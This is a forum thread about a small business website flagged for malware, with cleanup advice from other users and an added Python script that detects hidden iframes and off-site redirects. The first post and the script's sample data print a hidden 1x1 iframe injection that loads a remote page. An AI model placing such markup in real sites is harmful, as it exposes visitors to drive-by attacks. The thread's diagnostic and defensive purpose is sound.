Malware on my Website!

  • 18-06-2013 9:05am
    #1
    Registered Users Posts: 146 ✭✭


    Today I got an email from Google informing me that my website has malware. I coded the site myself; it is simple, and there is no possibility of me putting in malware. I am with Digiweb.

    Google has a "This site may harm your computer" tag when searching for my site, which is most distressing to see.

    My website is: dublinrolfing.com

    Sucuri SiteCheck gives me the following:

    Hidden Iframes.
    Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
    <iframe src=http://ajaxfamilies.org/go.php?sid=3 width=1 height=1 style="visibility:hidden;position:absolute;top:-10;left:-1337;">


    Can I assume that my site was hacked? And what can I do about this?

    I want to log into Digiweb services, delete my site and rebuild it. But Digiweb have migrated to different software and I cannot find out how to do FTP access. The irony: hackers can access my site and I can't.

    Could this be something to do with the Digiweb migration?


    Please help.


Comments

  • Registered Users Posts: 146 ✭✭kipple


    Changed passwords.

    I removed the Google Analytics web tracking code as I didn't understand it, and so it could be infected. There was an unknown .php file which I removed.

    Rescanned with Sucuri SiteCheck and it came up clean. Resubmitted to Google.


  • Posts: 0 [Deleted User]


    Hi, if you coded it yourself then there is a high probability it's vulnerable. Do you use WordPress or anything along those lines?

    Google launched an initiative in the past year to actively look for and contact the owners of websites it thinks have been tampered with. It's actually quite impressive... Google it and you'll find information about it.

    You did the correct thing - change the password.

    I can't seem to access your site? Did you take it down?


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    This might help depending on what happened:

    Get in touch with digiweb for ftp details.

    Go through every file and remove any offending iframe calls and any other dodgy script calls which might also have been injected.
    Scour every directory for .htaccess files which include dodgy redirects.
    Resubmit for review to Google through webmaster tools and at https://www.stopbadware.org/request-review

    Try in future to use SFTP with a very strong password, keep stuff like WordPress or the like up to date and back up your files properly.

    Give your own machine a good cleaning with the likes of Malwarebytes (mbam) and some other utils. Also have a look at advice here: http://www.boards.ie/vbulletin/showthread.php?t=2055274237


  • Registered Users Posts: 146 ✭✭kipple


    Thanks for the advice.

    Yes, my site is down, not sure why. I cannot log in to FTP, so could be a Digiweb problem?

    On passwords, Digiweb have a 10-character maximum, which should be fine unless the database got hacked.

    I found this Ars Technica piece fascinating:

    http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/2/


  • Posts: 0 [Deleted User]


    It's a good article, length and complexity are key... people think if it's random then it doesn't need to be long.

    The fact that your site is down is a little concerning.... I don't think Digiweb would be down... best contact them and find out if they're experiencing problems.



  • Registered Users Posts: 48 Jane Blonde


    This might be an important update to this post, but it's starting to look like the problem is with Digiweb and not just your site. I have seen other sites also hosted on Digiweb web3.host.ie that have the same symptoms.

    Take a look at this article:
    http://blog.sucuri.net/2013/06/new-apache-module-injection.html

    Any techies that can shed some light here?


  • Registered Users Posts: 146 ✭✭kipple



    Yes, that is it!! I moved providers as Digiweb refused to acknowledge that it was their problem. Scary piece of malware. My site was infected with this for over a week and my site was still not blocked by Google.

    So if it was getting around Google blocking my site, it potentially means that when people post links on boards they could be infected.
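
Added example (not part of any post in this thread): a Python sketch of the checks listed earlier in the thread (hidden iframes in page files, off-site redirects in .htaccess), extended to server-level injection such as the Apache module case linked above, where the markup is added as the page is served and the file on disk can be clean. The function names, sample markup and example.test hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic: styles that take an element out of view.
HIDING = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none|(?:top|left)\s*:\s*-\d+", re.I)
DIRECTIVE = re.compile(r"(RewriteRule|Redirect(Match|Permanent|Temp)?)\b", re.I)

class _IframeFinder(HTMLParser):
    """Collect the src of every iframe sized or styled to be invisible."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        tiny = any(a.get(d, "").strip() in ("0", "1") for d in ("width", "height"))
        if tiny or HIDING.search(a.get("style", "")):
            self.hits.append(a.get("src", ""))

def hidden_iframes(html):
    finder = _IframeFinder()
    finder.feed(html)
    return finder.hits

def htaccess_offsite_redirects(text, own_host):
    """Redirect/RewriteRule lines that send visitors to another host."""
    flagged = []
    for line in map(str.strip, text.splitlines()):
        urls = re.findall(r"https?://[^\s\"'\]]+", line) if DIRECTIVE.match(line) else []
        if any(urlparse(u).hostname != own_host for u in urls):
            flagged.append(line)
    return flagged

def injected_by_server(disk_html, served_html):
    """Hidden iframes in the served page that the file on disk does not contain."""
    on_disk = set(hidden_iframes(disk_html))
    return [src for src in hidden_iframes(served_html) if src not in on_disk]

# Constructed sample data; example.test hosts are placeholders.
DISK = "<html><body><h1>Home</h1></body></html>"
SERVED = ('<html><body><h1>Home</h1><iframe src="http://bad.example.test/go.php?sid=3" width=1 '
          'height=1 style="visibility:hidden;position:absolute;top:-10;left:-1337;"></iframe></body></html>')
HTACCESS = "RewriteRule ^old$ /new [R=301,L]\nRewriteRule .* http://bad.example.test/in.php [R=302,L]\n"
```

A non-empty result from `injected_by_server` when the uploaded file is clean means re-uploading the site will not help, which matches what was reported here for a plain HTML site.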


  • Registered Users Posts: 5 fixmypc.ie


    @kipple: I may be able to help you, I am a web developer. Can you please tell me what kind of website it is? Static or dynamic? I mean, do the pages end with .htm/.html or with .php? Do you have a backend where the content etc. can be updated? Is it built on some framework like WordPress, Joomla etc.?

    I am sorry for all these questions, just trying to get a feel of the environment. :)


  • Registered Users Posts: 48 Jane Blonde


    Hi Kipple, it's built on Xoops, are you familiar?


  • Registered Users Posts: 146 ✭✭kipple


    fixmypc,

    Thank you for the offer!
    The site was all HTML, I coded it myself using Notepad, with no PHP, no backend and no framework. I have moved provider and the problem has gone.

